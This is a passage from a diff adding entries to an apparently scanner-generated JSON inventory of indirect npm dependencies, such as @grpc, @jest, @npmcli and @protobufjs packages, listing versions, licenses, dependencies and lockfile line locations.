"pkg:npm/%40firebase/webchannel-wrapper@1.0.4", + "UID": "b2c0c01e633d9950" + }, + "Version": "1.0.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3188, + "EndLine": 3193 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@gar/promisify@1.1.3", + "Name": "@gar/promisify", + "Identifier": { + "PURL": "pkg:npm/%40gar/promisify@1.1.3", + "UID": "f79a59d567ca65b6" + }, + "Version": "1.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3194, + "EndLine": 3200 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@grpc/grpc-js@1.9.15", + "Name": "@grpc/grpc-js", + "Identifier": { + "PURL": "pkg:npm/%40grpc/grpc-js@1.9.15", + "UID": "532701ac0a5b3e80" + }, + "Version": "1.9.15", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@grpc/proto-loader@0.7.15", + "@types/node@24.7.0" + ], + "Locations": [ + { + "StartLine": 3201, + "EndLine": 3213 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@grpc/proto-loader@0.7.15", + "Name": "@grpc/proto-loader", + "Identifier": { + "PURL": "pkg:npm/%40grpc/proto-loader@0.7.15", + "UID": "7928f7fffd2daf59" + }, + "Version": "0.7.15", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lodash.camelcase@4.3.0", + "long@5.3.2", + "protobufjs@7.5.4", + "yargs@17.7.2" + ], + "Locations": [ + { + "StartLine": 3214, + "EndLine": 3231 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@hapi/hoek@9.3.0", + "Name": "@hapi/hoek", + "Identifier": { + "PURL": "pkg:npm/%40hapi/hoek@9.3.0", + "UID": "22d5d7a9e9def86e" + }, + "Version": "9.3.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3232, + "EndLine": 3238 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@hapi/topo@5.1.0", + "Name": "@hapi/topo", + "Identifier": { + "PURL": "pkg:npm/%40hapi/topo@5.1.0", + "UID": "7ed5c00c0d1ef03b" + }, + "Version": "5.1.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@hapi/hoek@9.3.0" + ], + "Locations": [ + { + "StartLine": 3239, + "EndLine": 3248 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@isaacs/balanced-match@4.0.1", + "Name": "@isaacs/balanced-match", + "Identifier": { + "PURL": "pkg:npm/%40isaacs/balanced-match@4.0.1", + "UID": "dd528aa69002bac2" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13529, + "EndLine": 13536 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@isaacs/brace-expansion@5.0.0", + "Name": "@isaacs/brace-expansion", + "Identifier": { + "PURL": "pkg:npm/%40isaacs/brace-expansion@5.0.0", + "UID": "8e954b8711d9795" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@isaacs/balanced-match@4.0.1" + ], + "Locations": [ + { + "StartLine": 13537, + "EndLine": 13547 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@isaacs/cliui@8.0.2", + "Name": "@isaacs/cliui", + "Identifier": { + "PURL": "pkg:npm/%40isaacs/cliui@8.0.2", + "UID": "1fb3060faa0cbadd" + }, + "Version": "8.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "string-width-cjs@4.2.3", + "string-width@5.1.2", + "strip-ansi-cjs@6.0.1", + "strip-ansi@7.1.2", + "wrap-ansi-cjs@7.0.0", + "wrap-ansi@8.1.0" + ], + "Locations": [ + { + "StartLine": 3311, + "EndLine": 3327 + }, + { + "StartLine": 13548, + "EndLine": 13565 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@isaacs/fs-minipass@4.0.1", + "Name": "@isaacs/fs-minipass", + "Identifier": { + "PURL": "pkg:npm/%40isaacs/fs-minipass@4.0.1", + "UID": "fc0a6b7918b87a81" + }, + "Version": "4.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@7.1.2" + ], + "Locations": [ + { + "StartLine": 13618, + "EndLine": 13630 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@isaacs/string-locale-compare@1.1.0", + "Name": "@isaacs/string-locale-compare", + "Identifier": { + "PURL": "pkg:npm/%40isaacs/string-locale-compare@1.1.0", + "UID": "9f428d7c910fe0bf" + }, + "Version": "1.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13631, + "EndLine": 13637 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@isaacs/ttlcache@1.4.1", + "Name": "@isaacs/ttlcache", + "Identifier": { + "PURL": "pkg:npm/%40isaacs/ttlcache@1.4.1", + "UID": "88b0b1c11f1e2618" + }, + "Version": "1.4.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3407, + "EndLine": 3415 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@istanbuljs/load-nyc-config@1.1.0", + "Name": "@istanbuljs/load-nyc-config", + "Identifier": { + "PURL": "pkg:npm/%40istanbuljs/load-nyc-config@1.1.0", + "UID": "461a4fd9d6048ab0" + }, + "Version": "1.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "camelcase@5.3.1", + "find-up@4.1.0", + "get-package-type@0.1.0", + "js-yaml@3.14.1", + "resolve-from@5.0.0" + ], + "Locations": [ + { + "StartLine": 3416, + "EndLine": 3431 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@istanbuljs/schema@0.1.3", + "Name": "@istanbuljs/schema", + "Identifier": { + "PURL": "pkg:npm/%40istanbuljs/schema@0.1.3", + "UID": "31e9bbdf807befbc" + }, + "Version": "0.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3515, + "EndLine": 3523 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jest/create-cache-key-function@29.7.0", + "Name": "@jest/create-cache-key-function", + "Identifier": { + "PURL": "pkg:npm/%40jest/create-cache-key-function@29.7.0", + "UID": "5e63b125c76f5bf6" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/types@29.6.3" + ], + "Locations": [ + { + "StartLine": 3590, + "EndLine": 3601 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jest/environment@29.7.0", + "Name": "@jest/environment", + "Identifier": { + "PURL": "pkg:npm/%40jest/environment@29.7.0", + "UID": "7826de6146ae2019" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/fake-timers@29.7.0", + "@jest/types@29.6.3", + "@types/node@24.7.0", + "jest-mock@29.7.0" + ], + "Locations": [ + { + "StartLine": 3602, + "EndLine": 3616 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jest/fake-timers@29.7.0", + "Name": "@jest/fake-timers", + "Identifier": { + "PURL": "pkg:npm/%40jest/fake-timers@29.7.0", + "UID": "21bdb7e79f69ba9c" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/types@29.6.3", + "@sinonjs/fake-timers@10.3.0", + "@types/node@24.7.0", + "jest-message-util@29.7.0", + "jest-mock@29.7.0", + "jest-util@29.7.0" + ], + "Locations": [ + { + "StartLine": 3644, + "EndLine": 3660 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jest/schemas@29.6.3", + "Name": "@jest/schemas", + "Identifier": { + "PURL": "pkg:npm/%40jest/schemas@29.6.3", + "UID": "7d01f972513ab39c" + }, + "Version": "29.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@sinclair/typebox@0.27.8" + ], + "Locations": [ + { + "StartLine": 3721, + "EndLine": 3732 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jest/transform@29.7.0", + "Name": "@jest/transform", + "Identifier": { + "PURL": "pkg:npm/%40jest/transform@29.7.0", + "UID": "ded336d6ffd8fab2" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@jest/types@29.6.3", + "@jridgewell/trace-mapping@0.3.31", + "babel-plugin-istanbul@6.1.1", + "chalk@4.1.2", + "convert-source-map@2.0.0", + "fast-json-stable-stringify@2.1.0", + "graceful-fs@4.2.11", + "jest-haste-map@29.7.0", + "jest-regex-util@29.6.3", + "jest-util@29.7.0", + "micromatch@4.0.8", + "pirates@4.0.7", + "slash@3.0.0", + "write-file-atomic@4.0.2" + ], + "Locations": [ + { + "StartLine": 3780, + "EndLine": 3805 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jest/types@29.6.3", + "Name": "@jest/types", + "Identifier": { + "PURL": "pkg:npm/%40jest/types@29.6.3", + "UID": "30d11510c2044def" + }, + "Version": "29.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/schemas@29.6.3", + "@types/istanbul-lib-coverage@2.0.6", + "@types/istanbul-reports@3.0.4", + "@types/node@24.7.0", + "@types/yargs@17.0.33", + "chalk@4.1.2" + ], + "Locations": [ + { + "StartLine": 3806, + "EndLine": 3822 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jridgewell/gen-mapping@0.3.13", + "Name": "@jridgewell/gen-mapping", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/gen-mapping@0.3.13", + "UID": "59a23ce09ed9de75" + }, + "Version": "0.3.13", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jridgewell/sourcemap-codec@1.5.5", + "@jridgewell/trace-mapping@0.3.31" + ], + "Locations": [ + { + "StartLine": 3823, + "EndLine": 3832 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jridgewell/remapping@2.3.5", + "Name": "@jridgewell/remapping", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/remapping@2.3.5", + "UID": "52e1018d6912a7d3" + }, + "Version": "2.3.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jridgewell/gen-mapping@0.3.13", + "@jridgewell/trace-mapping@0.3.31" + ], + "Locations": [ + { + "StartLine": 3833, + "EndLine": 3842 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jridgewell/resolve-uri@3.1.2", + "Name": "@jridgewell/resolve-uri", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/resolve-uri@3.1.2", + "UID": "988fd01e25a61599" + }, + "Version": "3.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3843, + "EndLine": 3851 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jridgewell/source-map@0.3.11", + "Name": "@jridgewell/source-map", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/source-map@0.3.11", + "UID": "f88ffe6a7b782fd0" + }, + "Version": "0.3.11", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jridgewell/gen-mapping@0.3.13", + "@jridgewell/trace-mapping@0.3.31" + ], + "Locations": [ + { + "StartLine": 3852, + "EndLine": 3861 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jridgewell/sourcemap-codec@1.5.5", + "Name": "@jridgewell/sourcemap-codec", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/sourcemap-codec@1.5.5", + "UID": "15bfc4709b69856" + }, + "Version": "1.5.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3862, + "EndLine": 3867 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@jridgewell/trace-mapping@0.3.31", + "Name": "@jridgewell/trace-mapping", + "Identifier": { + "PURL": "pkg:npm/%40jridgewell/trace-mapping@0.3.31", + "UID": "cc01dd57a433c93b" + }, + "Version": "0.3.31", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jridgewell/resolve-uri@3.1.2", + "@jridgewell/sourcemap-codec@1.5.5" + ], + "Locations": [ + { + "StartLine": 3868, + "EndLine": 3877 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@nodelib/fs.scandir@2.1.5", + "Name": "@nodelib/fs.scandir", + "Identifier": { + "PURL": "pkg:npm/%40nodelib/fs.scandir@2.1.5", + "UID": "33f9a4a8ef1ef332" + }, + "Version": "2.1.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@nodelib/fs.stat@2.0.5", + "run-parallel@1.2.0" + ], + "Locations": [ + { + "StartLine": 3899, + "EndLine": 3911 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@nodelib/fs.stat@2.0.5", + "Name": "@nodelib/fs.stat", + "Identifier": { + "PURL": "pkg:npm/%40nodelib/fs.stat@2.0.5", + "UID": "ec91831ff847063d" + }, + "Version": "2.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3912, + "EndLine": 3920 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@nodelib/fs.walk@1.2.8", + "Name": "@nodelib/fs.walk", + "Identifier": { + "PURL": "pkg:npm/%40nodelib/fs.walk@1.2.8", + "UID": "ad58d83664468dfe" + }, + "Version": "1.2.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@nodelib/fs.scandir@2.1.5", + "fastq@1.19.1" + ], + "Locations": [ + { + "StartLine": 3921, + "EndLine": 3933 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/agent@3.0.0", + "Name": "@npmcli/agent", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/agent@3.0.0", + "UID": "7632afa959e64b2c" + }, + "Version": "3.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "agent-base@7.1.4", + "http-proxy-agent@7.0.2", + "https-proxy-agent@7.0.6", + "lru-cache@10.4.3", + "socks-proxy-agent@8.0.5" + ], + "Locations": [ + { + "StartLine": 14981, + "EndLine": 14995 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/agent@4.0.0", + "Name": "@npmcli/agent", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/agent@4.0.0", + "UID": "f23fbdc6af1653c1" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "agent-base@7.1.4", + "http-proxy-agent@7.0.2", + "https-proxy-agent@7.0.6", + "lru-cache@11.2.2", + "socks-proxy-agent@8.0.5" + ], + "Locations": [ + { + "StartLine": 13638, + "EndLine": 13654 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/arborist@9.1.6", + "Name": "@npmcli/arborist", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/arborist@9.1.6", + "UID": "4456a9e769d5e004" + }, + "Version": "9.1.6", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@isaacs/string-locale-compare@1.1.0", + "@npmcli/fs@4.0.0", + "@npmcli/installed-package-contents@3.0.0", + "@npmcli/map-workspaces@5.0.0", + "@npmcli/metavuln-calculator@9.0.2", + "@npmcli/name-from-folder@3.0.0", + "@npmcli/node-gyp@4.0.0", + "@npmcli/package-json@7.0.1", + "@npmcli/query@4.0.1", + "@npmcli/redact@3.2.2", + "@npmcli/run-script@10.0.0", + "bin-links@5.0.0", + "cacache@20.0.1", + "common-ancestor-path@1.0.1", + "hosted-git-info@9.0.2", + "json-stringify-nice@1.1.4", + "lru-cache@11.2.2", + "minimatch@10.0.3", + "nopt@8.1.0", + "npm-install-checks@7.1.2", + "npm-package-arg@13.0.1", + "npm-pick-manifest@11.0.1", + "npm-registry-fetch@19.0.0", + "pacote@21.0.3", + "parse-conflict-json@4.0.0", + "proc-log@5.0.0", + "proggy@3.0.0", + "promise-all-reject-late@1.0.1", + "promise-call-limit@3.0.2", + "semver@7.7.3", + "ssri@12.0.0", + "treeverse@3.0.0", + "walk-up-path@4.0.0" + ], + "Locations": [ + { + "StartLine": 13655, + "EndLine": 13700 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/config@10.4.2", + "Name": "@npmcli/config", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/config@10.4.2", + "UID": "f44f6dd37243f898" + }, + "Version": "10.4.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/map-workspaces@5.0.0", + "@npmcli/package-json@7.0.1", + "ci-info@4.3.1", + "ini@5.0.0", + "nopt@8.1.0", + "proc-log@5.0.0", + "semver@7.7.3", + "walk-up-path@4.0.0" + ], + "Locations": [ + { + "StartLine": 13701, + "EndLine": 13718 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/fs@1.1.1", + "Name": "@npmcli/fs", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/fs@1.1.1", + "UID": "709e392631b38ea7" + }, + "Version": "1.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@gar/promisify@1.1.3", + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 3934, + "EndLine": 3944 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/fs@4.0.0", + "Name": "@npmcli/fs", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/fs@4.0.0", + "UID": "578643750e37ce20" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 13719, + "EndLine": 13729 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/git@7.0.0", + "Name": "@npmcli/git", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/git@7.0.0", + "UID": "c2dac0b98614bce7" + }, + "Version": "7.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/promise-spawn@8.0.3", + "ini@5.0.0", + "lru-cache@11.2.2", + "npm-pick-manifest@11.0.1", + "proc-log@5.0.0", + "promise-retry@2.0.1", + "semver@7.7.3", + "which@5.0.0" + ], + "Locations": [ + { + "StartLine": 13730, + "EndLine": 13747 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/installed-package-contents@3.0.0", + "Name": "@npmcli/installed-package-contents", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/installed-package-contents@3.0.0", + "UID": "2a279910279e5f52" + }, + "Version": "3.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "npm-bundled@4.0.0", + "npm-normalize-package-bin@4.0.0" + ], + "Locations": [ + { + "StartLine": 13748, + "EndLine": 13762 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/map-workspaces@5.0.0", + "Name": "@npmcli/map-workspaces", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/map-workspaces@5.0.0", + "UID": "90bb5525fc07076c" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/name-from-folder@3.0.0", + "@npmcli/package-json@7.0.1", + "glob@11.0.3", + "minimatch@10.0.3" + ], + "Locations": [ + { + "StartLine": 13763, + "EndLine": 13776 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/metavuln-calculator@9.0.2", + "Name": "@npmcli/metavuln-calculator", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/metavuln-calculator@9.0.2", + "UID": "b6eedb73c7f8b840" + }, + "Version": "9.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cacache@20.0.1", + "json-parse-even-better-errors@4.0.0", + "pacote@21.0.3", + "proc-log@5.0.0", + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 13777, + "EndLine": 13791 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/move-file@1.1.2", + "Name": "@npmcli/move-file", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/move-file@1.1.2", + "UID": "4700456a38b747a8" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mkdirp@1.0.4", + "rimraf@3.0.2" + ], + "Locations": [ + { + "StartLine": 3958, + "EndLine": 3972 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/name-from-folder@3.0.0", + "Name": "@npmcli/name-from-folder", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/name-from-folder@3.0.0", + "UID": "e58208e2b8b4fbed" + }, + "Version": "3.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13792, + "EndLine": 13799 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/node-gyp@4.0.0", + "Name": "@npmcli/node-gyp", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/node-gyp@4.0.0", + "UID": "f19a8d4d63901e89" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13800, + "EndLine": 13807 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/package-json@7.0.1", + "Name": "@npmcli/package-json", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/package-json@7.0.1", + "UID": "b9e2a71d6cc7b1ec" + }, + "Version": "7.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/git@7.0.0", + "glob@11.0.3", + "hosted-git-info@9.0.2", + "json-parse-even-better-errors@4.0.0", + "proc-log@5.0.0", + "semver@7.7.3", + "validate-npm-package-license@3.0.4" + ], + "Locations": [ + { + "StartLine": 13808, + "EndLine": 13824 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/promise-spawn@8.0.3", + "Name": "@npmcli/promise-spawn", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/promise-spawn@8.0.3", + "UID": "42d4c8a2d08f9b79" + }, + "Version": "8.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "which@5.0.0" + ], + "Locations": [ + { + "StartLine": 13825, + "EndLine": 13835 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/query@4.0.1", + "Name": "@npmcli/query", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/query@4.0.1", + "UID": "d558d185fbab590f" + }, + "Version": "4.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "postcss-selector-parser@7.1.0" + ], + "Locations": [ + { + "StartLine": 13836, + "EndLine": 13846 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/redact@3.2.2", + "Name": "@npmcli/redact", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/redact@3.2.2", + "UID": "c881395ad7eca136" + }, + "Version": "3.2.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13847, + "EndLine": 13854 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@npmcli/run-script@10.0.0", + "Name": "@npmcli/run-script", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/run-script@10.0.0", + "UID": "a0517891f2c49621" + }, + "Version": "10.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/node-gyp@4.0.0", + "@npmcli/package-json@7.0.1", + "@npmcli/promise-spawn@8.0.3", + "node-gyp@11.4.2", + "proc-log@5.0.0", + "which@5.0.0" + ], + "Locations": [ + { + "StartLine": 13855, + "EndLine": 13870 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@pkgjs/parseargs@0.11.0", + "Name": "@pkgjs/parseargs", + "Identifier": { + "PURL": "pkg:npm/%40pkgjs/parseargs@0.11.0", + "UID": "43b8f37e228c5046" + }, + "Version": "0.11.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3973, + "EndLine": 3982 + }, + { + "StartLine": 13871, + "EndLine": 13881 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/aspromise@1.1.2", + "Name": "@protobufjs/aspromise", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/aspromise@1.1.2", + "UID": "9e186767cf428422" + }, + "Version": "1.1.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3983, + "EndLine": 3988 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/base64@1.1.2", + "Name": "@protobufjs/base64", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/base64@1.1.2", + "UID": "8b2ca4b86e757b35" + }, + "Version": "1.1.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3989, + "EndLine": 3994 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/codegen@2.0.4", + "Name": "@protobufjs/codegen", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/codegen@2.0.4", + "UID": "f497e2c6710c141e" + }, + "Version": "2.0.4", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3995, + "EndLine": 4000 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/eventemitter@1.1.0", + "Name": "@protobufjs/eventemitter", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/eventemitter@1.1.0", + "UID": "4f8611cfc41e6468" + }, + "Version": "1.1.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4001, + "EndLine": 4006 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/fetch@1.1.0", + "Name": "@protobufjs/fetch", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/fetch@1.1.0", + "UID": "cde2d09b008ad738" + }, + "Version": "1.1.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@protobufjs/aspromise@1.1.2", + "@protobufjs/inquire@1.1.0" + ], + "Locations": [ + { + "StartLine": 4007, + "EndLine": 4016 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/float@1.0.2", + "Name": "@protobufjs/float", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/float@1.0.2", + "UID": "4587e0c9c3df858a" + }, + "Version": "1.0.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4017, + "EndLine": 4022 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/inquire@1.1.0", + "Name": "@protobufjs/inquire", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/inquire@1.1.0", + "UID": "8de5d0f880b55c0c" + }, + "Version": "1.1.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4023, + "EndLine": 4028 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/path@1.1.2", + "Name": "@protobufjs/path", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/path@1.1.2", + "UID": "ce5083e64d190831" + }, + "Version": "1.1.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4029, + "EndLine": 4034 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/pool@1.1.0", + "Name": "@protobufjs/pool", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/pool@1.1.0", + "UID": "e6a2ffdefe5db296" + }, + "Version": "1.1.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4035, + "EndLine": 4040 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@protobufjs/utf8@1.1.0", + "Name": "@protobufjs/utf8", + "Identifier": { + "PURL": "pkg:npm/%40protobufjs/utf8@1.1.0", + "UID": "c94dd4338d8b252e" + 